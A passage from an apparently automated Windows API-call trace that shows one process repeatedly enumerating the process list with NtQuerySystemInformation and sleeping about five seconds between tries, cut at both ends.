BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.142] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.146] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.147] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.148] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.154] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.154] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.156] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.158] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.158] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.162] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.163] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.165] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.166] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.166] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.171] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.172] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.173] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.173] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.174] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.174] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.178] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.179] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.180] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.181] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.181] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.182] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.185] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.186] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.188] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.188] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.189] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.189] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.189] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.192] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.193] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.195] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.195] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.196] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.196] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.196] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.200] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.200] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.202] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.203] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.203] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.203] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.206] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.207] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.209] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.209] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.210] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.210] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.213] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.214] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.218] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.219] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.223] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.228] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.229] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.229] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.230] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.230] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.234] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.235] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.247] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.248] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.248] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.252] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.252] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.255] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.255] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.255] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.258] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.259] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.261] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.261] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.261] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.262] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.265] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.266] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.271] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.275] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.275] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.277] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.279] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.279] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.283] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.284] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.285] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.286] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.287] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.287] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.290] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.291] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.293] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.294] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.294] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.297] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.298] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.299] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.300] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.300] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.305] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.306] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.308] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.309] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.310] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.315] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.317] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, 